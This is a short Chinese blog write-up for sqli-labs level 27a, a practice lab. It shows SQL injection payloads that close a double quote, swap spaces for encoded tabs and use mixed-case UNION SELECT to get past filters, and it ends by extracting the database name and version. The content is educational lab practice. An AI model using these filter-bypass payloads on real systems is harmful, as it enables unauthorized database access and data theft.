sqllab第二十七A关通关笔记

I_WORM2024-03-20 20:00

知识点:

  • 双引号闭合
  • union select 大小写绕过
    • Union Select
  • 这里不能进行错误注入,无回显

经过测试发现这是一个双引号闭合

构造payload:id=1"%09and%091="1

页面成功回显

构造payload:id=0"%09uNion%09SElect%091,2,3%09"1

页面成功回显除了输入内容

获取数据库名和版本信息

构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1

成功获取了数据库名和版本信息

10

相关推荐
报错小能手8 小时前
C++笔记(面向对象)RTTI操作符
开发语言·c++·笔记
CodeLongBear8 小时前
计算机网络学习笔记 | 传输层核心知识点总结(DAY03,匠心制作)
笔记·学习·计算机网络
wdfk_prog9 小时前
[Linux]学习笔记系列 -- [kernel][time]tick
linux·笔记·学习
峰顶听歌的鲸鱼10 小时前
9.OpenStack管理(三)
运维·笔记·分布式·openstack·学习方法
立志成为大牛的小牛11 小时前
数据结构——三十七、关键路径(王道408)
数据结构·笔记·程序人生·考研·算法
oe101911 小时前
好文与笔记分享 A Survey of Context Engineering for Large Language Models(下)
人工智能·笔记·语言模型·agent
冷雨夜中漫步12 小时前
高级系统架构师笔记——系统质量属性与架构评估(1)软件系统质量属性
笔记·架构·系统架构
oe101912 小时前
好文与笔记分享 A Survey of Context Engineering for Large Language Models(中)
人工智能·笔记·语言模型·agent开发
许长安13 小时前
C++中指针和引用的区别
c++·经验分享·笔记
摇滚侠13 小时前
Spring Boot3零基础教程,StreamAPI 介绍,笔记98
java·spring boot·笔记
热门推荐
01GitHub 镜像站点02《大数据技术原理与应用》实验报告三 熟悉HBase常用操作03UV安装并设置国内源04综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件05BongoCat - 跨平台键盘猫动画工具06Linux下V2Ray安装配置指南07npm使用国内淘宝镜像的方法08jdk21下载、安装(Windows、Linux、macOS)09NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)